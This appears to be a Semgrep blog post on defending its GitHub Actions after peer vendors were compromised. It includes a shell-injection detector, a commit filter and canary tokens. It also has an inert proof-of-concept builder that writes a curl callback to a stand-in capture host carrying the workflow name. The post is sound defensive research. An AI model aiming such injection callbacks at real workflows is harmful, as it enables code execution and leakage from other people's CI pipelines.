The bad guys are targeting security vendors. In incidents ranging from Aqua Security’s Trivy container scanner to Aqua Security itself and Checkmarx’s KICS, initial compromise may have been followed by significant lateral movement via GitHub Actions.



Before we publish about incidents like LiteLLM, we run an internal incident response motion to make sure we aren't compromised ourselves (or next). This post covers a couple of the activities we use: mapping the attack surface, and exploring PoCs to help identify indicators of compromise.

The Motivation

Semgrep is a GitHub Cloud customer. Like many cloud-native companies, we have a significant GitHub Actions footprint. Seeing peer security companies suffer GitHub Actions-related incidents immediately raised alarms across the organization, from our executive team to our internal security and security research teams. GitHub Actions as an attack surface is not new to us at Semgrep: we maintain GitHub Actions-specific rules, and we know Actions is an attractive target. Some near-misses in the past have helped inform this incident response plan and the defense of our infrastructure.

Mapping Attack Surface





We knew from other compromises that the attackers were likely using GitHub Actions (GHA) as a point of entry, so we narrowed our focus to our public footprint: any Action that could potentially be invoked from outside the organization. Our research team immediately began re-scanning our perimeter Actions with the run-shell-injection rule.

https://semgrep.dev/r?q=yaml.github-actions.security.run-shell-injection.run-shell-injection
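The pattern run-shell-injection targets is a `${{ ... }}` expression carrying attacker-controlled data (an issue title, a pull request branch name) interpolated directly into a `run:` script. The runner substitutes the expression into the script text before the shell parses it, so the value can become shell syntax. The sketch below is not the Semgrep rule; it is a minimal stdlib-only approximation that assumes the workflow has already been parsed into a Python dict (for example with a YAML library). The trigger list and tainted-context patterns are illustrative assumptions, not exhaustive lists, and the `triggers`/`find_run_injections` helpers are hypothetical.

```python
import re
from typing import Iterator

# Events an outside contributor can trigger on a public repository
# (illustrative subset, not exhaustive).
EXTERNAL_TRIGGERS = {
    "pull_request", "pull_request_target", "pull_request_review",
    "pull_request_review_comment", "issues", "issue_comment",
    "discussion", "discussion_comment",
}

# Expression contexts whose values an outsider controls (illustrative subset).
TAINTED_CONTEXT = re.compile(
    r"github\.event\.(issue\.(title|body)"
    r"|pull_request\.(title|body|head\.ref|head\.label)"
    r"|comment\.body|review\.body|discussion\.(title|body))"
    r"|github\.head_ref"
)

# Captures the contents of each ${{ ... }} expression.
EXPRESSION = re.compile(r"\$\{\{(.*?)\}\}", re.DOTALL)


def triggers(workflow: dict) -> set:
    """Return the event names a parsed workflow listens for."""
    # PyYAML follows YAML 1.1, so a bare `on:` key loads as the boolean True.
    on = workflow.get("on", workflow.get(True, {}))
    if isinstance(on, str):
        return {on}
    return set(on or ())  # list and mapping forms both yield event names


def find_run_injections(workflow: dict) -> Iterator[tuple[str, int, str]]:
    """Yield (job_id, step_index, expression) for tainted ${{ }} in run steps."""
    if not triggers(workflow) & EXTERNAL_TRIGGERS:
        return  # not reachable from outside the organization
    for job_id, job in workflow.get("jobs", {}).items():
        for index, step in enumerate(job.get("steps", [])):
            script = step.get("run", "")
            for expr in EXPRESSION.findall(script):
                if TAINTED_CONTEXT.search(expr):
                    yield job_id, index, expr.strip()


if __name__ == "__main__":
    example = {
        "on": {"issues": {"types": ["opened"]}},
        "jobs": {
            "triage": {
                "runs-on": "ubuntu-latest",
                "steps": [{"run": 'echo "New issue: ${{ github.event.issue.title }}"'}],
            }
        },
    }
    print(list(find_run_injections(example)))  # [('triage', 0, 'github.event.issue.title')]
```

The standard remediation for a hit is to move the expression into the step's `env:` block and reference the quoted environment variable in the script, so the value is passed as data rather than spliced into shell source.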



Drawing on lessons from the Semgrep Workflows project, our researchers used publicly available details about attacker tactics, techniques, and procedures (TTPs) to task an agent swarm with reviewing our public repository history for suspicious activity.

LLM-Accelerated PoCs

Once we had a candidate set of potentially problematic endpoints, we needed to evaluate them.

We spun up an agent swarm to collect the known TTPs from public reporting, search our GitHub history for unusual contributions, and run the relevant Semgrep rules against our public-facing GitHub Actions.
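A deterministic first pass over repository history can shrink what the agents need to review. The sketch below assumes commit records have already been exported (for example from `git log --name-only`); the `Commit` type, the `known_authors` allowlist, and the heuristic itself (CI-definition changes by authors outside the allowlist) are hypothetical illustrations, not the TTP checks we actually ran.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Commit:
    """Hypothetical minimal commit record exported from repository history."""
    sha: str
    author_email: str
    paths: tuple[str, ...]


# Paths whose modification changes what runs in CI.
SENSITIVE_PREFIXES = (".github/workflows/", ".github/actions/")
ACTION_METADATA = {"action.yml", "action.yaml"}  # composite/JS action definitions


def touches_ci(path: str) -> bool:
    """True if a changed path can alter CI behavior."""
    return path.startswith(SENSITIVE_PREFIXES) or path in ACTION_METADATA


def flag_unusual_commits(commits: list[Commit], known_authors: set[str]) -> list[Commit]:
    """Return commits that touch CI definitions and come from unknown authors.

    `known_authors` is expected to hold lowercase email addresses.
    """
    return [
        c for c in commits
        if any(touches_ci(p) for p in c.paths)
        and c.author_email.lower() not in known_authors
    ]


if __name__ == "__main__":
    history = [
        Commit("a1b2c3", "dev@example.com", (".github/workflows/ci.yml",)),
        Commit("d4e5f6", "stranger@example.net", (".github/workflows/release.yml",)),
        Commit("0718aa", "stranger@example.net", ("README.md",)),
    ]
    for commit in flag_unusual_commits(history, {"dev@example.com"}):
        print(commit.sha)  # prints d4e5f6
```

Anything this filter flags is a lead for closer review, not a verdict; an allowlist miss is just as likely to be a new colleague as an attacker.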

Semgrep’s researchers have previously authored weaponized GHA exploits, so we already had the vocabulary and expertise to write LLM-friendly specifications for reliable, inert PoCs. As a result, the PoC attempts ran fully autonomously, with a human verifying any true positive at the other end. The LLM-generated payloads were specified to make a remote call, carrying the name of the affected workflow, to a capture endpoint monitored by a human researcher, similar to Burp Collaborator testing workflows. Anything that didn’t get a definitive “obviously not” response from the exploit attempts went straight onto a remove/patch list.
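The inert-PoC bookkeeping can be sketched in a few lines: each candidate gets a payload whose only side effect is a callback carrying the workflow name, the capture side maps hits back to candidates for a human to confirm, and anything not definitively ruled out is queued for remediation. In this sketch the capture URL, the `wf`/`id` query parameters, and all helper names are hypothetical; `GITHUB_WORKFLOW` is the default runner environment variable holding the workflow's name. How the command reaches a given sink is deliberately left out.

```python
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlsplit

CAPTURE_URL = "https://capture.example.invalid/hit"  # hypothetical capture endpoint


def make_inert_payload(candidate: str, pending: dict[str, str]) -> str:
    """Build a shell command whose only effect is a callback naming the workflow.

    `candidate` is our own label for the workflow under test; the random
    token lets the capture side tie a hit back to that label.
    """
    token = secrets.token_hex(8)
    pending[token] = candidate
    # curl -G appends the --data-urlencode values to the URL as a query string.
    return (
        'curl -fsS -G --data-urlencode "wf=$GITHUB_WORKFLOW" '
        f'--data-urlencode "id={token}" {CAPTURE_URL}'
    )


def parse_hit(request_path: str, pending: dict[str, str]) -> Optional[tuple[str, str]]:
    """Map a captured request path to (candidate, reported workflow name)."""
    query = parse_qs(urlsplit(request_path).query)
    token = query.get("id", [""])[0]
    if token not in pending:
        return None  # noise, or a request we did not generate
    return pending[token], query.get("wf", ["?"])[0]


def patch_list(candidates: list[str], ruled_out: set[str]) -> list[str]:
    """Anything without a definitive "obviously not" verdict gets remediated."""
    return [c for c in candidates if c not in ruled_out]
```

Limiting the callback to a single non-secret value is what keeps the PoC inert: a hit proves code execution without reading or moving any secrets.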

Outcomes, Remediation and Takeaways

Our IR workflow detected at least one exploitable GitHub Action, and it has already been patched; Semgrep Autofix allowed our CEO to confidently apply the remediation. Once we had sure footing and fixes in place, we took a second look around to see what could have happened. As a result, we deployed additional canary tokens to dramatically increase the chance that a successful attacker is detected immediately.

While every incident response motion is different, and no one playbook works for everyone, we feel there are some repeatable lessons worth sharing. Here are some actionable takeaways your team can learn from ours.

While LLMs certainly improved our time-to-fix metrics and our proof-of-concept velocity, there is no substitute for human expertise. Human findings were first out of the gate (humans still on top 💪) and were replicated in the LLM dataset, which gave us the confidence we needed to act on the robot dataset. My teammates Lewis Ardern and Vasilii Ermilov were already familiar with the hotspots in our organization; while they applied the human touch, I leaned all the way into the agentic future, drawing on my experience sprinting on authoring Semgrep Workflows.

A defender’s largest advantage is starting with control of the engagement space. Every time you revisit your attack surface, make it less hospitable to attackers. Cloud CI footholds are always a goldmine for credentials, which made CI an easy place to drop in canary tokens, and canaries are cheap. Context-aware credential theft is hard to automate: attackers need to know enough about your org to tell what’s real from what’s bait.
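Canary credentials work because nothing legitimate ever uses them, so any appearance of one in an authentication log is an alert by construction. A minimal sketch of the bookkeeping, assuming you can observe authentication attempts somewhere (for example an API gateway log); the `CanaryRegistry` class, the token prefix, and the log line format are all hypothetical.

```python
import secrets


class CanaryRegistry:
    """Hypothetical registry of decoy credentials planted in CI."""

    def __init__(self) -> None:
        self._planted: dict[str, str] = {}  # token -> where it was planted

    def mint(self, location: str, prefix: str = "ci_deploy_") -> str:
        """Create a credential-shaped decoy and remember where it was planted."""
        token = prefix + secrets.token_urlsafe(24)
        self._planted[token] = location
        return token

    def check(self, log_line: str) -> list[str]:
        """Return the planted locations whose decoy appears in a log line."""
        return [loc for tok, loc in self._planted.items() if tok in log_line]


if __name__ == "__main__":
    registry = CanaryRegistry()
    decoy = registry.mint("org/repo: DEPLOY_TOKEN repository secret")
    line = f"auth failure token={decoy} ip=203.0.113.7"
    for location in registry.check(line):
        print(f"canary tripped: {location}")
```

Choosing a prefix that matches the naming conventions of your real secrets is what makes the bait plausible to an attacker sorting loot by hand.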

All technology is just tools; use the right tool for the job. LLMs are good at structured text with rules and bad at “thinking”. Frame toil on structured text (like code) with specific vocabulary, and outsource as much as possible to deterministic tools. If your organization is LLM-friendly, refusing to use them leaves a tool on the table.
